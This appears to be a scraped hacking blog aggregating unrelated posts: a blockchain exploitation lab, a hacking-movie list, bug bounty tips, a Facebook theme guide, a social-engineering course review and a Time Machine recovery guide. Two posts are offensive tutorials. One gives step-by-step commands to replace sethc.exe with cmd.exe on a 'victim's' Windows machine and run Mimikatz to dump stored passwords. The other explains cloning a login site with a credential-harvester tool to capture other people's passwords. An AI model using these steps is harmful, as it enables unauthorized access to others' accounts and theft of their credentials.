The Incident Response Challenge 2020 — Win $5,000 Prize!

Cybersecurity firm Cynet today announced the launch of a first of its kind challenge to enable Incident Response professionals to test their skills with 25 forensic challenges that were built by top researchers and analysts. The challenge is available on https://ift.tt/2Vrf4e0 and is open to anyone willing to test his or her investigation skills, between April 21st and May

via The Hacker News

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Related posts

1. Hacking Forums
2. Hacking Bluetooth Speaker
3. Hacking Netflix Account
4. Tecnicas De Hacking
5. Tecnicas De Ingenieria Social
6. Curso De Ciberseguridad Y Hacking Ético
7. Hacking Course

Blockchain Exploitation Labs - Part 2 Hacking Blockchain Authorization

Bypassing Blockchain Authorization via Unsecured Functions

Note: Since the first part of this series I have also uploaded some further videos on remediation of reentrancy and dealing with compiler versions when working with this hacking blockchain series.  Head to the console cowboys YouTube account to check those out.  Haha as mentioned before I always forget to post blogs when I get excited making videos and just move on to my next project… So make sure to subscribe to the YouTube if you are waiting for any continuation of a video series.. It may show up there way before here. 

Note 2:  You WILL run into issues when dealing with Ethereum hacking, and you will have to google them as versions and functionality changes often... Be cognizant of versions used hopefully you will not run into to many hard to fix issues. 

In the second part of this lab series we are going to take a look at privacy issues on the blockchain which can result in a vulnerably a traditional system may  not face. Since typically blockchain projects are open source and also sometimes viewable within blockchain explorers but traditional application business logic is not usually available to us. With traditional applications we might not find these issues due to lack of knowledge of internal functionality or inability to read private values on a remote server side script.  After we review some issues we are going to exploit an authorization issues by writing web3.js code to directly bypass vertical authorization restrictions.

Blockchain projects are usually open source projects which allow you to browse their code and see what's going on under the hood.  This is fantastic for a lot of reasons but a developer can run into trouble with this if bad business logic decisions are deployed to the immutable blockchain.  In the first part of this series I mentioned that all uploaded code on the blockchain is immutable. Meaning that if you find a vulnerability it cannot be patched. So let's think about things that can go wrong..

A few things that can go wrong:

• Randomization functions that use values we can predict if we know the algorithm
• Hard-coded values such as passwords and private variables you can't change.
• Publicly called functions which offer hidden functionality
• Race conditions based on how requirements are calculated

Since this will be rather technical, require some setup and a lot of moving parts we will follow this blog via the video series below posting videos for relevant sections with a brief description of each.  I posted these a little bit ago but have not gotten a chance to post the blog associated with it.  Also note this series is turning into a full lab based blockchain exploitation course so keep a lookout for that.

In this first video you will see how data about your project is readily available on the blockchain in multiple formats for example:

• ABI data that allows you to interact with methods.
• Actual application code.
• Byte code and assembly code.
• Contract addresses and other data.

 Lab Video Part 1: Blockchain OSINT: 

Once you have the data you need to interact with a contract on the blockchain via some OSINT how do you actually interface with it? That's the question we are going to answer in this second video. We will take the ABI contract array and use it to interact with methods on the blockchain via Web3.js and then show how this correlates to its usage in an HTML file

Lab Video Part 2: Connecting to a Smart Contract: 

Time to Exploit an Application:

Exploit lab time, I created an vulnerable application you can use to follow along in the next video. Lab files can be downloaded from the same location as the last blog located below. Grab the AuthorizationLab.zip file:

Lab file downloads:

https://github.com/cclabsInc/BlockChainExploitation

Ok so you can see what's running on the blockchain, you can connect to it, now what?   Now we need to find a vulnerability and show how to exploit it. Since we are talking about privacy in this blog and using it to bypass issues. Lets take a look at a simple authorization bypass we can exploit by viewing an authorization coding error and taking advantage of it to bypass restrictions set in the Smart Contract.  You will also learn how to setup a local blockchain for testing purposes and you can download a hackable application to follow along with the exercises in the video..

Lab Video Part 3:  Finding and hacking a Smart Contract Authorization Issue: 

Summary:

In this part of the series you learned a lot, you learned how to transfer your OSINT skills to the blockchain. Leverage the information found to connect to that Smart Contract. You also learned how to interact with methods and search for issues that you can exploit. Finally you used your browsers developer console as a means to attack the blockchain application for privilege escalation.

Related news

1. Hacking Food
2. Chema Alonso Libros
3. Hacking Food
4. Ingeniería Social El Arte Del Hacking Personal
5. Hacking Mac
6. Hacking The System
7. Que Hay Que Estudiar Para Ser Hacker
8. Diferencia Entre Hacker Y Cracker
9. Funnel Hacking Live
10. Hacking Con Buscadores Pdf

TOP 10 HACKING MOVIES YOU SHOULD WATCH

Technology and hacking gave a new horizon to the science fiction movies. As hacking is getting common and every online thing is at risk whether it's 10% or 90%, not a system is 100% secure over the internet. Every day new security holes are getting discovered. So, now most of the sci-fi movies have the tech and hack stuff to grow awareness in everybody's mind about the online privacy and risk to their information. Here I am sharing top 10 hacking movies that worth a watch.

TOP 10 HACKING MOVIES

Here I have listed top 10 hacking movies that you should watch.

1. HACKERS (1995)

In Hackers, Angelina Jolie and Jonny Lee Miller portray two youthful and hip hackers. Miller portrays a hacker who got caught as a very young child at an age of 11 years after crashing thousands of computers and has been sentenced to zero computer access until his 18th birthday.

2. LIVE FREE OR DIE HARD (2007)

Live Free or Die Hard (also known as Die Hard 4 and released as Die Hard 4.0 outside North America) is a 2007 American action film, and the fourth in the Die Hard film series depicts a scenario where a hacker played by Timothy Olyphant (of Justified fame) takes down nearly the entire U.S. infrastructure in an attempt to transfer trillions of dollars from the Federal Reserve to his account. This movie gives a complete idea of how actually these blackhat hackers operate.

3. EAGLE EYE (2008)

In this movie, two people get a call from an unknown number by a woman. They get a task on the phone that if they don't follow the phone call they would die. This movie displays supercomputer hack on all networks and military networks. This is just an amazing movie on how artificial intelligence computer hacks our real life for bad motives.

4. ALGORITHM (2014)

The film 'Algorithm' tracks the travails of Will, who is the freelance computer hacker who hacks into a top-secret government contractor agency and downloads all their recently developed programs." You can see the full movie below

5. WARGAMES (1983)

The film features David Lightman (Broderick), a young high school student hacker who accidentally hacks into a military supercomputer and starts the countdown to World War III.

6. THE MATRIX (1999)

This is one of the greatest science fiction movies. In this movie, reality, as perceived by most humans, is actually a simulated reality called "the Matrix", created by machines to subdue the human population, while their bodies' heat and electrical activity are used as an energy source.

A character named "Neo", who is a computer Hacker, learns this truth and is drawn into a rebellion against the machines, which involves other people who have been freed from the "dream world". The Matrix franchise is a trilogy movie series.

7. TAKEDOWN (2000)

This movie is based on famous computer U.S. hacker Kevin David Mitnick. Based upon the book and written by his nemesis, Tsutomu Shimomura, the story tends to glorify Shimomura. Mitnick operated in the 1980s and '90s and eventually went to prison for a couple of years. Now, he is a highly paid IT security consultant, speaker, and writer.

8. BLACKHAT (2015)

Blackhat is newly released movie by Chris Hemsworth. In this movie, hackers hack the Chinese nuclear power plant to start a nuclear reaction. Simultaneously, they also hack the stock exchange and steal millions of dollars from the bank. This movie shows how a black hat hackers threaten governments.

9. THE ITALIAN JOB (2003)

Although the MINI Coopers are really the stars of The Italian Job (a remake of the 1969 film of the same name), Seth Green plays Lyle, a hacker among a group of elite thieves, who is able to manipulate traffic signals, among other devices, that make this grand theft possible.

10. UNTRACEABLE (2008)

This film involves a serial killer who rigs contraptions that kill his victims based on the number of hits received by a website KillWithMe.com that features a live streaming video of the victim. Millions of people log on, hastening the victims' deaths.

There may be more exciting hacking movies but I found these top 10 hacking movies that you should watch for once.

You can also find out the top 5 most dangerous hackers in the real world living.

More info

1. Hacking Simulator
2. Curso Hacking Gratis
3. Etica Definicion
4. Hacking Background
5. Curso De Hacking
6. Hacking Meaning

How Do I Get Started With Bug Bounty ?

How do I get started with bug bounty hunting? How do I improve my skills?



These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.
Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.

Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.


Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

Related links

• Que Es Hacker En Informatica
• Aprender A Hackear Desde Cero
• Google Hacking
• Cracker Definicion
• Que Es El Hacking Etico
• Master Growth Hacking
• Hacking Linux Distro

How To Change Facebook’s Default Theme To Any Color You Want

How To Change Facebook's Default Theme To Any Color You Want

We are going to share an interesting trick on changing your Facebook default theme. You just need a Google Chrome extension to perform this trick. If you are among me who feels very fatigued with the look of Facebook's by default theme then this is a must-see post because you will find out the easiest trick to make your facebook more attractive than before.

Facebook is a social networking site which empowers people to connect with friends and people around. That's how Facebook is habitually introduced. However, Facebook is beyond the need of being introduced as almost everyone is on it.

   A couple of Days ago I was simply Surfing Google Chrome website and I somehow stumbled upon a Chrome Extension. Yes, a Chrome extension that will give your Facebook a Whole new look. I was apprehensive to try it, So I just installed it and checked my facebook. I was astonished to see my facebook homepage have all new look. I found it refreshing and decided to write steps on How to Change Facebook Themes using Chrome Extension.

How To Change Facebook's Default Theme To Any Color You Want

If You are among me who feels very fatigued with the look of Facebook's by default theme then this is a must-see post, Because you will find out the easiest trick to make your facebook more attractive than before. Simply follow the steps to know about it.

How to Change Facebook Theme Using Chrome Extension

Step 1. Install Stylish for Chrome from the Chrome Web Store. It will take hardly a minute to get installed in your Chrome browser.

Change Facebook Theme Using Chrome Extension

Step 2. Navigate to Facebook.com and click on the S button. Click on Find Styles for this Site to open a new tab with free themes to use for Facebook. Most of the themes are free and attractive too you can easily browse over the full website to discover your favorite theme.

Change Facebook Theme Using Chrome Extension

Step 3. Now You will be redirected towards https://userstyles.org Guess what! This site contains huge numbers of Facebook themes, One thing is for sure that you will be confused in-between what to select and which one to skip. Select any them and click on it. Now you will be given a full preview of your selected theme.

Change Facebook Theme Using Chrome Extension

Step 4. If everything is fine in the previewed theme, click on Install with Stylish button at the top right corner of the page. It will take few seconds or minutes depends on your theme size to be installed in Stylish Extension, once installed you will be notified with a success message.

Change Facebook Theme Using Chrome Extension

Step 5. Now whenever you open Facebook, it will show the theme that you have installed with Stylish instead of the boring old blue theme.

Change Facebook Theme Using Chrome Extension

More information

1. Que Es Un Hacker
2. Hacking Definicion
3. Hacking Time
4. Black Hacker
5. Growth Hacking Sean Ellis
6. Libros Para Aprender A Hackear
7. Curso De Ciberseguridad Y Hacking Ético
8. Ethical Hacking

Cracking Windows 8/8.1 Passwords With Mimikatz

You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...

Requirements:

1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
2. Mimikatz (Download | Blog)
3. Physical Access to victim's machine
4. A Working Brain in that Big Head (Download Here)

Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this

9. Now navigate to your usb drive in my case its drive G:

10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)

11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)

That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)

More information

1. Hacking Desde Cero
2. Hacking Wifi Kali Linux
3. Life Hacking
4. Hacking Kali Linux

Social Engineering Pentest Professional(SEPP) Training Review

Intro:
I recently returned from the new Social Engineering training provided by Social-Engineer.org in the beautiful city of Seattle,WA, a state known for sparkly vampires, music and coffee shop culture.  As many of you reading this article, i also read the authors definitive book Social Engineering- The art of human hacking and routinely perform SE engagements for my clients. When i heard that the author of the aforementioned book was providing training i immediately signed up to get an in person glance at the content provided in the book. However, i was pleasantly surprised to find the course covered so much more then what was presented in the book.

Instructors:

• Chris Hadnagy the author of the book Social Engineering- The art of human hacking.
• Robin Dreeke the author of the book It's not all about me.

I wasn't aware that there would be more then one instructor and was extremely happy with the content provided by both instructors. Chris and Robin both have a vast amount of knowledge and experience in the realm of social engineering.  Each instructor brought a different angle and use case scenario to the course content. Robin is an FBI agent in charge of behavioral analysis and uses social engineering in his daily life and work to get the results needed to keep our country safe. Chris uses social engineering in his daily work to help keep his clients secure and provides all sorts of free learning material to the information security community through podcasts and online frameworks.



Course Material and Expectation: 
I originally thought that the material covered in class would be a live reiteration of the material covered in Chris's book. However, I couldn't have been more wrong !!  The whole first day was about reading yourself and other people, much of the material was what Robin uses to train FBI agents in eliciting information from possible terrorist threats. Each learning module was based on live demo's, nightly labs, and constant classroom interaction. Each module was in depth and the level of interaction between students was extremely useful and friendly. I would say the instructors had as much fun as the students learning and sharing social techniques and war stories.
The class was heavily made up of ways to elicit personal and confidential information in a way that left the individuatial "Happier for having met you".  Using language, body posture and social truisms as your weapon to gather information, not intended for your ears, but happily leaving the tongue of your target.
Other class activities and materials included an in depth look at micro expressions with labs and free extended learning material going beyond the allotted classroom days.  Also break out sessions which focused on creating Phone and Phishing scripts to effectively raise your rate of success. These sessions were invaluable at learning to use proper language techniques on the phone and in email to obtain your objectives.

Nightly Missions/Labs: 
If you think that you are going to relax at night with a beer. Think again!! You must ensure that your nights are free, as you will be going on missions to gain information from live targets at venues of your choice.  Each night you will have a partner and a mission to gain certain information while making that persons day better then it started.  The information  you are requested to obtain will change each night and if done properly you will notice all of the material in class starting to unfold.. When you get to body language training you will notice which targets are open and when its best to go in for the kill. You will see interactions change based on a persons change in posture and facial expressions. Each day you will take the new techniques you have learned and put them into practice. Each morning you have to report your findings to the class..
During my nightly labs i obtained information such as door codes to secured research facilities, information regarding secret yet to be released projects.  On the lighter side of things i obtained much personal information from my targets along with phone numbers and invitations for further hangouts and events. I made many new friends inside and outside of class.
There were also labs within the confines of the classroom such as games used to solidify your knowledge and tests to figure out what kind of learner you are. Technical labs on the use of information gathering tools and ways to use phone and phishing techniques to your advantage via linguistically and technologically. Essentially the class was about 60% interaction and labs.


Proof it works:
After class i immediately had a phishing and phone based contract at my current employment. I used the email and phone scripts that we created in class with 100% click rate and 100% success in phone elicitation techniques. Gaining full unfettered access to networks through phone and email elicitation and interaction. Although I do generally have a decent SE success rate, my rates on return are now much higher and an understanding of what works and what doesn't, and why are much more refined.


Conclusion and Certification:
I paid for this class out of pocket, including all expenses, hotels, rentals cars and planes etc etc. I would say that the class was worth every penny in which i paid for it. Many extras were given including black hat passes, extended training from notable sources and continued interaction from instructors after class ended. I would highly recommend this class to anyone looking for a solid foundation in social engineering or a non technical alternative to training.  You will learn a lot, push yourself in new ways and have a blast doing it. However I did not see any sparkly vampires while in seattle.... Twilight lied to me LOL
The certification is a 48 hour test in which you will utilize your knowledge gained technologically and socially to breach a company.I am not going to give away to much information about the certification as i haven't taken it yet and I do not want to misspeak on the subject. However I will say that social-engineer.org has done an excellent job at figuring out a way to include Real World Social Engineering into a test with verifiable proof of results. I am going to take my test in a couple weeks and it should be a blast!!!

Thanks and I hope this review is helpful to all those looking for SE training.  I had a blast :) :)

Continue reading

1. Curso De Hacking
2. Grey Hat Hacking
3. Hacking For Dummies
4. Cosas De Hackers
5. Hacking Usb

HACKING PASSWORDS USING CREDENTIAL HARVESTER ATTACK

Everything over the internet is secured by the passwords. You need a login to do any stuff on any social or banking website. Passwords are the first security measure for these type of websites. So, I brought a tutorial on how to hack such sort of login passwords. This tutorial is based on credential harvester attack method. In which you will know about hacking passwords using credential harvester attack method.

HACKING PASSWORDS USING CREDENTIAL HARVESTER ATTACK

REQUIREMENTS

It's very simple and easy to follow. Before you start, you need the following things to work with.

1. Kali Linux OS
2. Target Website

STEPS TO FOLLOW

• Run the Kali Linux machine. If you have not Kali Linux installed, you can grab a free copy and install it as a virtual machine. You can learn more about Kali Linux VirtualBox installation.
• Sign in to Kali Linux by entering username root and password toor.
• As you'll sign in, navigate to the Applications > Social Engineering Tools > Social Engineering as shown in the following screenshot.
• Now you will see the different options. You have to choose Social Engineering Attacks by simply entering its number in the terminal. Once you do it, it will show a few options further. Simply choose Website Vector Attack by putting its number.
• Website vector attack will show up it's a different type of attacks. We are going to use Credential Harvester Attack.
• Choose the Site Clone option. As you do it, it will ask for your public IP address. Just open up a new terminal and type ifconfig. It'll show the public IP. Just copy it and paste in the previous terminal as shown in the following screenshots.
• After we do it. Enter the target website of which passwords you want to hack. Make sure to use a website that has username and password on the same page.
• All done now. As someone opens up the browser on the public IP we specified, it'll show up the website that we entered in the previous step. Now as someone enters their username or password, it will be captured in the terminal.

That's all. If you're not clear yet. You can watch the following complete video tutorial on how to do it.

Read more

• Defcon Hacking
• White Hacking
• Growth Hacking Pdf
• Fake Hacking
• Hacking Games
• Hacking Pdf
• Mindset Hacking Nacho
• Hacking 2018
• House Hacking

Recovering Data From An Old Encrypted Time Machine Backup

Recovering data from a backup should be an easy thing to do. At least this is what you expect. Yesterday I had a problem which should have been easy to solve, but it was not. I hope this blog post can help others who face the same problem.

The problem

1. I had an encrypted Time Machine backup which was not used for months
2. This backup was not on an official Apple Time Capsule or on a USB HDD, but on a WD MyCloud NAS
3. I needed files from this backup
4. After running out of time I only had SSH access to the macOS, no GUI

The struggle

By default, Time Machine is one of the best and easiest backup solution I have seen. As long as you stick to the default use case, where you have one active backup disk, life is pink and happy. But this was not my case.

As always, I started to Google what shall I do. One of the first options recommended that I add the backup disk to Time Machine, and it will automagically show the backup snapshots from the old backup. Instead of this, it did not show the old snapshots but started to create a new backup. Panic button has been pressed, backup canceled, back to Google.

Other tutorials recommend to click on the Time Machine icon and pressing alt (Option) key, where I can choose "Browse other backup disks". But this did not list the old Time Machine backup. It did list the backup when selecting disks in Time Machine preferences, but I already tried and failed that way.

YAT (yet another tutorial) recommended to SSH into the NAS, and browse the backup disk, as it is just a simple directory where I can see all the files. But all the files inside where just a bunch of nonsense, no real directory structure.

YAT (yet another tutorial) recommended that I can just easily browse the content of the backup from the Finder by double-clicking on the sparse bundle file. After clicking on it, I can see the disk image on the left part of the Finder, attached as a new disk.
Well, this is true, but because of some bug, when you connect to the Time Capsule, you don't see the sparse bundle file. And I got inconsistent results, for the WD NAS, double-clicking on the sparse bundle did nothing. For the Time Capsule, it did work.
At this point, I had to leave the location where the backup was present, and I only had remote SSH access. You know, if you can't solve a problem, let's complicate things by restrict yourself in solutions.

Finally, I tried to check out some data forensics blogs, and besides some expensive tools, I could find the solution.

The solution

Finally, a blog post provided the real solution - hdiutil.
The best part of hdiutil is that you can provide the read-only flag to it. This can be very awesome when it comes to forensics acquisition.

To mount any NAS via SMB:

mount_smbfs afp://<username>@<NAS_IP>/<Share_for_backup> /<mountpoint>

To mount a Time Capsule share via AFP:

mount_afp afp://any_username:password@<Time_Capsule_IP>/<Share_for_backup> /<mountpoint>

And finally this command should do the job:

hdiutil attach test.sparsebundle -readonly

It is nice that you can provide read-only parameter.

If the backup was encrypted and you don't want to provide the password in a password prompt, use the following:

printf '%s' 'CorrectHorseBatteryStaple' | hdiutil attach test.sparsebundle -stdinpass -readonly

Note: if you receive the error "resource temporarily unavailable", probably another machine is backing up to the device

And now, you can find your backup disk under /Volumes. Happy restoring!

Probably it would have been quicker to either enable the remote GUI, or to physically travel to the system and login locally, but that would spoil the fun.

Related posts

• Servicio Hacker
• Hacking Udemy
• Hacking Live
• Growth Hacking Barcelona
• Como Hacker
• Como Ser Hacker
• Curso Completo De Hacking Ético
• Raspberry Hacking
• Hacking Day
• Libro Hacking Etico